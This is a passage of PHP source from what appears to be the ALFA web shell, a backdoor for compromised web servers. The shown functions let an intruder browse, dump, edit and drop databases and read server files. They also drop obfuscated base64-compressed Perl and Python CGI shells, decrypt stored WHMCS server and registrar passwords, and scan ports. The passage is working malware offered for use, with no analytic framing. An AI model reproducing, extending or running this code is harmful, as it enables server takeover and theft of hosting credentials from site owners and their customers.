5113<script>mysql_cache['host']='".addslashes($_POST['sql_host'])."';mysql_cache['user']='".addslashes($_POST['sql_login'])."';mysql_cache['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['db']='".addslashes($_POST['sql_base'])."';mysql_cache['charset']='".addslashes($_POST['charset'])."';mysql_cache['type']='".addslashes($_POST['type'])."';mysql_cache['count']='".addslashes($_POST['sql_count'])."'</script>
5114";
5115if(isset($db) && $db->link){
5116echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
5117if(!empty($_POST['sql_base'])){
5118$db->selectdb($_POST['sql_base']);
5119echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>";
5120$tbls_res = $db->listTables();
5121while($item = $db->fetch($tbls_res)){
5122list($key, $value) = each($item);
5123if(!empty($_POST['sql_count']))
5124$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
5125$value = htmlspecialchars($value);
5126echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href='javascript:void(0);' onclick=\"fs('0','".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?' ':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
5127}
5128echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4');\" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');\" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>".($dumpStatus?'<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>':'')."</td><td style='border-top:2px solid #666;'>";
5129if(@$_POST['alfa1'] == 'select'){
5130$_POST['alfa1'] = 'query';
5131$_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
5132$db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
5133$num = $db->fetch();
5134$pages = ceil($num['n'] / 30);
5135echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
5136echo " of $pages";
5137if($_POST['alfa3'] > 1)
5138echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]')>< Prev</a>";
5139if($_POST['alfa3'] < $pages)
5140echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]')>Next ></a>";
5141$_POST['alfa3']--;
5142$cache_table = $_POST['alfa2'];
5143if($_POST['type']=='pgsql')
5144$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
5145else
5146$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
5147echo "<br><br>";
5148}
5149if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
5150$prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
5151$db->query(@$_POST['alfa2']);
5152if($db->res !== false){
5153$title = false;
5154echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
5155$line = 1;
5156while($item = $db->fetch()) {
5157if(!$title){
5158echo '<tr><th>#</th>';
5159foreach($item as $key => $value){
5160echo '<th>'.$key.'</th>';
5161}
5162reset($item);
5163$title=true;
5164echo '</tr><tr>';
5165$line = 2;
5166}
5167if($cache_table!=''){
5168 $cacheMsg = '<a href="javascript:void(0);" onclick=fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\')>Edit</a>';
5169}else{
5170 $cacheMsg ='-';
5171}
5172echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
5173$line = $line==1?2:1;
5174foreach($item as $key => $value){
5175if($value == null)
5176echo '<td><i>null</i></td>';
5177else
5178echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
5179}
5180echo '</tr>';
5181}
5182echo '</table>';
5183} else {
5184echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
5185}
5186}
5187echo('</form>');
5188if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){
5189$data = explode(':',$_POST['alfa3']);
5190echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
5191echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
5192if($data[1] != '0'){
5193$data[2] = __ZGVjb2Rlcg($data[2]);
5194$data[2] = str_replace('"','',$data[2]);
5195$fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
5196$fetch['__ALFAKEY'] = $data[1];
5197$fetch['__ALFAKEYVAL'] = $data[2];
5198}else{
5199$d = __ZGVjb2Rlcg($data[2]);
5200$fetch = json_decode($d, true);
5201}
5202foreach($fetch as $key => $value){
5203if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
5204$value = htmlspecialchars($value);
5205echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
5206}
5207echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
5208}
5209if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){
5210$data = json_decode($_POST['alfa2'], true);
5211$alfadata = $data['__ALFADATA'];
5212$data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
5213$keyval = array();
5214echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
5215echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
5216$set = '';
5217foreach($data as $key => $value){
5218if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
5219if($data2['__ALFAKEY']==$key){
5220$keyval['__ALFAKEY'] = $key;
5221$keyval['__ALFAKEYVAL'] = $value;
5222}
5223$set .= "`$key` = '".addslashes($value)."',";
5224$value = htmlspecialchars($value);
5225echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
5226}
5227unset($data['__ALFADATA']);
5228
5229echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
5230
5231if(!isset($data2['__ALFAKEY'])){
5232$where = '';
5233foreach($data2 as $key => $value){
5234if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
5235$value = addslashes($value);
5236$where .= "`$key` = '$value' AND ";
5237}
5238$where = substr($where, 0, -4);
5239}else{
5240$where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
5241}
5242$set = substr($set, 0, -1);
5243$db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
5244if($db->error())
5245echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
5246else echo("Success...!");
5247}
5248if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){
5249echo "<p>Query:</p><form onsubmit='fs(this);return false;'>
5250<input type='hidden' name='alfa1' value='query'/>
5251<textarea name='query' style='width:100%;height:100px'>";
5252echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
5253echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
5254}
5255echo "</td></tr>";
5256}
5257echo "</table></form><br/>";
5258if($_POST['type']=='mysql') {
5259$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
5260if($db->fetch())
5261echo "<form onsubmit=\"fs('3',this.f.value);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
5262}
5263if(@$_POST['alfa1'] == 'loadfile'){
5264$file = $db->loadFile($_POST['alfa2']);
5265echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
5266}
5267}else{
5268echo htmlspecialchars($db->error());
5269}
5270echo '</div>';
5271alfafooter();
5272}
5273function alfaselfrm(){
5274if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
5275echo(__pre().'<center>');
5276if(@unlink($GLOBALS['__file_path'])){
5277echo('<b>Shell has been removed</i> :)</b>');
5278}else{
5279echo 'unlink error!';
5280}
5281echo('</center>');
5282}
5283if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
5284echo "<div class=header>";
5285echo "
5286<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
5287echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
5288echo '</p></center></div>';
5289}
5290}
5291function alfacgishell(){
5292alfahead();
5293$div = "";
5294if(!in_array($_POST['alfa1'],array('perl','py'))){
5295$div = "</div>";
5296echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
5297}
5298if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
5299@mkdir('cgialfa',0755);
5300@chdir('cgialfa');
5301alfacgihtaccess('cgi');
5302$name = $_POST['alfa1'].'.alfa';
5303$perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("H4sIAAAAAAAA/6UZDXfTRvKvLBthSRBbtktazrJcQuJA3iUhlxju9aJgZGlt70OWVH2QpMb97Tezu7KkEKC0yUORZud7ZmdmlyJj5PT4dDwYvPQy9vMzuwDAEQ+ZBETeignQwU1AdG+WTRMvX+q25i/4NOApcQg8EcsoFw2ta5q29l8enU1guWtrZ5ODVXDJEviiLWprbyN+W0FsgBzEq5UXBRO+YnGRHxapl/M4gtUekF8u45vDO5DB/TdFnhQ5wm0NtBKC4WvB8jBe8Ih8/ozvyU3BA0MbmvhNvXDuoYhSoKFU+5VUig1ITSlTIJ+DwXVk6gcU8GhyE1DAOAdL7/OjritQLES4YOAY5udx2sQh/VGrR3qjVl/g4ltPwIAoK2bkgnnBuZeCy9dh7HshMZ7wyAQeL6aEz+FpK7DGd4kG7/D8yO7g+ckLQe5pEeY88dL8KE5Xh17uAak2Pnu31g/enE3GZ5Pp5Lfzsb4hzp/EWpXIrjUH9HYA+DaZxUUUeOmdY3Semppl87khOVyM//N2fDmZno4nr98cAg/2O6GvxhNqrjUebQUB0sVv08vJxfHZK31jb1iYfZvF+ZtL5JGC6cbl5PD4DKzh0e49vU/GZ68mr/WNaW+27P6uTaDwSwUBtfV2W+9oPftFyDPMriwJeW5YWxRL6APOfQ0asvRlHCCVhthXvesmGDRwUzfCf5/hT2SVy0jxwdZKYr18/ZNkgkKzAJVHa30Ouw+VRnuIQKpYAHdcxrx3XIq2uLQkk/i92pdgTS1rcR+WIQy8A0nk9G1licav4ZU/fQrOKQES/33nqZAoVKwvAXfDvVFKQBYqBSATlYniDVkY742GW0zzswBo8KWZQsUt7mOj0zGtxPM/GtSnu2TJbg2tZ5rWgglDUJKwFSjsDaYXW78Q+acC1yoDBiYyz1/CBzG6pNMh2g6AMVkr49ynFgHxRm0XVZwcyQmxd0nfVEZ+V8kfNKUDZdDtUtzfRsDmPGJQvspVLKZ1TGX1BovF2ySMvQDL9dpfxomhTbwUCuAZBMsU3GoAdNhBkaYsyg95aqJ+K+vKdV3rGva4Nkm9KJuzFJmJtUfG1XvrvetePzG1R3adESqh6h/uGrWEhJf8D5TDo9yAJF1gM2hmtEksqOn9ZyYWlThhkfH2/OTN/uHR8cl4l9BRTQw1zfWMR6s4YDUkYZaspnaSgiBSrZF7wmw/jLMGsSKhpbEsIPe1//fLjhtRhahPlowgQ0L1zkz1w4aXOzolN15GChEJ4JcVvs+ybF6E4V1Hl8mppB55qBr0mkfUlvE7xwUUrQIJ9YqsNSxbWJWGPsSKpaOhAMQRUKx47tB8ybOO/OgEPPNmwNXJ04LZYiXoQIYUzJnlsWcUEct8L2EGi3zw5NuLY+i1SRwBZ6OObUKaUQJI+V3CHLotolUNpWTF8mUcOLJcE8/HHu2AY7RLP+VJfgJ9CUHgktEw9GYsJEDsUOWaFKBZ4kWEA4vpdI6uLBIAWggdkWGWp3G0GLWiWZbY8nmwjCGCxBMxAESJMbQE99GQRzgNZPldCCqDJ5LQuxtEYByYglK2ksF5/tKLFogW+8UKrO9ABMchw9eXd8eB4epbnVzd7PAoYunryemJI7yE8rOr7nVHDESUSC8hlBJRGumckgzyx6E/7dFSM7kiI1XSlF8yRkrFLYXEWfIgYFHJOdgig6urHSzc/HUq70sRIpbwR6WVLhr7FKwSTThleZFGog3jCxFpaNcTWEGqzD33Fkx2prU2FvkVVPo16439EIJoDFfvvfYf++3/ddv/ujYt/bHeKSJZMF8/obtQLC22KPftQQyaR3kbDR6QnN3m1jJfhdhQtlt2iJDRcAl6jYY5z0M2OkDBZHZH9k+O9smE7Z+SNjl4dUzOWRoOLYk0FHk0erKGCTSEEiwTabOzTYv1HPyYD0jKF8vcjj+xFAA3A+l224/DOB3s9Pfm827XvuFBvhz0nnWTW7tMTCiLyLc9g6Hto43Kt7dMCAtDnmQ8s2+WPGdt2BI+WBjFN6mX2BuR7+sVlB0etYX8AZRR4A30OYdxsO2FfBENyAqUCZk9i1MICuAktySLQx4QKHX2DLy6SHGmAd9hBYQNDt4E7Nt2tvQC1KMLv8+Aaqc7/qn7bF9xaqdewItsgEvKNtLfQwV+xAy/SDPwEUlijgn4FcdIY4nc6+u6zmiDikHI5nmpSE94YiO2wpXYCnKPXa+VwFJenZcI7sNukpEkcYoF4yEHbHb8VbD+W9xK3/2CKj8QzwekJV4Q8GjRVk7KcqjKA7L35QpDTRC+waBAaD3YyliTlH6NvK5pX1O+FFzTpW7PzpH4KQUPej8Dmkr8vef+3t7zMvG73cfVDvGKPLY3WL5xgw0tuTVnOP3GEdamb1VlcDXW4zkgZAb2qNlCSHToTlf8QGGNE+lKh8IXpkbtU74KtWrfS4ZOFwB0FjCTpkGVrJouVBMlCgJJR1dkOKtKCXiEkcwLSAvS9xPPOHRh8qcAq68XixU0/I4fr4bWbESusf5GeVV/hzl2biLd7NAeDBJSS/QeJT7sJdw/4GihJ34rxzu0D4rmyCJoECmt57DrHPqOpYEXeWVfQhJQo2HXTr8/7vefi5XLSnNysOCqNs5GSm0CtTeC8yxYn8cEmz5LIcA4BHV0iZcH+MDG0mwRR3EM9pZTkNJ7RDutB8YfY9uHOrTiCA/0FfzFrMEUwhpPa3LUDcIJJPgxFgLktdbOUxh28ERXnb9rPWlExBEc4irmEjlH6Cqfuz/9Ai61ddBze9WAKolh5cX3KGrOodWA8yVNfzZnvT2gqalV4l+7GqF2NQ2iM2Y/PA3KleW9Jej8jVWYlhxXX8JOWzdmSFeHSKu7no7u6hux6v/QhOlXE+Y/nU+3o9aPjKJ/a7ICgEweSO46A6wWJbkvp0yoUNvZr/sXZzJfpus97HI2bM6NimQ0oo3ZWD6/S7+USkZiBg65/9GhEHw/juYcdpur76eM3MUFnFvg5VdIAJUBQCQSQk6ARA2Fcw8+7K1Or2M4p1WDJWToPxoqm9eAa+D0SG5cc+2FHqjbNatJUKASduszhiV55d3yVbEiORCTGM6IX7lTzBjYHhiZWZ7BxrfML3JWMlxvWtsrOPteOm1vuC4PLo7PJ9Oz/dMxHDNru73CGF+8G19sMZqna1Jex9iaTN0ShIdW7aKISmUcEjDcFtOZuJyVp2kfr8C0xqD9AFaAWPJSoIH6QV1ufsCTdGMN40XFwbyhAl4TvHezJ37gZk/xxgkvz2CwgBOivO75LoF9n0LGv3lFqi5oOzWovdHehMEDR4nKPdQPiFuv6S6F6qtY4aKSWwGV+V9xjWT8wbQ3rXsnHLy/wXvfv9RRth3DfVFPjhqmLO73WuIw4J/KBqGGQ5xmBn0cx/SRGD+k5YOHuomaMUUDqgKybUCySYOI0TD5tqjGYFoKL4dKksY3maP3uzrJEphJ/CWDoqKLygCiRTqorMaMUqdPc92qLqvKBPiLcawbU0+Pen3QLo9frfX9k4tTcQ3qtprb35b14ytFQd0of/EfDcD2s9Or8g3v6chnaouLKwWUmLvbemPi0SdkxrCxPgJWU3XgxRvQ1I1MvE1VCaBN8QC7AWndRnGsMlJo+GU13GzKFLLK+JQxtpLaSEbt1lfHJLt1b1Kz/w8wblS+FRoAAA==")));';;
5304$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
5305if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
5306if(__write_file($name,$code)){
5307@chmod($name,0755);
5308echo '<iframe src="'.'cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
5309}
5310}
5311echo $div;
5312alfafooter();
5313}
5314function alfaWhmcs(){
5315alfahead();
5316echo '<div class=header>';
5317function decrypt($string,$cc_encryption_hash){
5318$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
5319$hash_key = _hash($key);
5320$hash_length = strlen ($hash_key);
5321$string = __ZGVjb2Rlcg($string);
5322$tmp_iv = substr ($string, 0, $hash_length);
5323$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
5324$iv = $out = '';
5325$c = 0;
5326while ($c < $hash_length)
5327{
5328$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
5329++$c;
5330}
5331$key = $iv;
5332$c = 0;
5333while ($c < strlen ($string))
5334{
5335if (($c != 0 AND $c % $hash_length == 0))
5336{
5337$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
5338}
5339$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
5340++$c;
5341}
5342return $out;
5343}
5344function _hash($string)
5345{
5346if(function_exists('sha1'))
5347{
5348$hash = sha1 ($string);
5349}
5350else
5351{
5352$hash = md5 ($string);
5353}
5354$out = '';
5355$c = 0;
5356while ($c < strlen ($hash))
5357{
5358$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
5359$c += 2;
5360}
5361return $out;
5362}
5363AlfaNum(8,9,10);
5364echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
5365<input type='hidden' name='form_action' value='2'>";
5366$table = array('td1' =>
5367 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
5368 'td2' =>
5369 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
5370 'td3' =>
5371 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
5372 'td4' =>
5373 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
5374 'td5' =>
5375 array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
5376);
5377create_table($table);
5378echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
5379if($_POST['alfa5']!=''){
5380$db_host=($_POST['alfa7']);
5381$db_username=($_POST['alfa3']);
5382$db_password=($_POST['alfa4']);
5383$db_name=($_POST['alfa5']);
5384$cc_encryption_hash=($_POST['alfa6']);
5385echo __pre();
5386$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
5387$query = mysqli_query($conn,"SELECT * FROM tblservers");
5388$num = mysqli_num_rows($query);
5389if ($num > 0){
5390for($i=0; $i <=$num-1; $i++){
5391$v = @mysqli_fetch_array($query);
5392$ipaddress = $v['ipaddress'];
5393$username = $v['username'];
5394$type = $v['type'];
5395$active = $v['active'];
5396$hostname = $v['hostname'];
5397echo("<center><table border='1'>");
5398$password = decrypt ($v['password'], $cc_encryption_hash);
5399echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
5400echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
5401echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
5402echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
5403echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
5404echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
5405echo "</table><br><br></center>";
5406}
5407$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
5408$num1 = @mysqli_num_rows($query1);
5409if ($num1 > 0){
5410for($i=0; $i <=$num1 -1; $i++){
5411$v = mysqli_fetch_array($query1);
5412$registrar = $v['registrar'];
5413$setting = $v['setting'];
5414$value = decrypt($v['value'], $cc_encryption_hash);
5415if ($value==""){
5416$value=0;
5417}
5418echo("<center>Domain Reseller <br><center>");
5419echo("<center><table border='1'>");
5420echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
5421echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
5422echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
5423echo "</table><br><br></center>";
5424}
5425}
5426}else{__alert('<font color="red">tblservers is Empty...!</font>');};
5427}
5428echo "</div>";
5429alfafooter();
5430}
5431function alfaportscanner(){
5432alfahead();
5433echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
5434<form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
5435<input type="hidden" name="y" value="phptools">
5436<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
5437<div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
5438<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
5439</form></center><br>';
5440$start = strip_tags($_POST['alfa2']);
5441$end = strip_tags($_POST['alfa3']);
5442$host = strip_tags($_POST['alfa4']);
5443if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
5444echo __pre();
5445$packetContent = "GET / HTTP/1.1\r\n\r\n";
5446if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
5447else{
5448$packetContent = str_replace(array("\r","\n"), "", $packetContent);
5449$packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
5450}
5451for($i = $start; $i<=$end; $i++){
5452$sock = @fsockopen($host, $i, $errno, $errstr, 3);
5453if($sock){
5454stream_set_timeout($sock, 5);
5455fwrite($sock, $packetContent."\r\n\r\n\x00");
5456$counter = 0;
5457$maxtry = 1;
5458$bin = "";
5459do{
5460$line = fgets($sock, 1024);
5461if(trim($line)=="")$counter++;
5462$bin .= $line;
5463}while($counter<$maxtry);
5464fclose($sock);
5465echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
5466echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
5467}
5468flush();
5469}
5470}
5471echo '</div>';
5472alfafooter();
5473}
5474function alfacgihtaccess($m,$d='', $symname=false){
